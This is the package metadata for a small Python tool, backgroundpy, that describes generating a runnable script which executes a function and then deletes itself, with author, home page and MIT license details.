Metadata-Version: 2.1
Name: backgroundpy
Version: 1.0.0
Summary: A tool for generating a runnable script, which runs a function and deletes itself after it is ran.
Home-page: https://github.com/davidmaamoaix/BackgroundPy
Author: David Ma
Author-email: davidma@davidma.cn
License: MIT
Platform: UNKNOWN
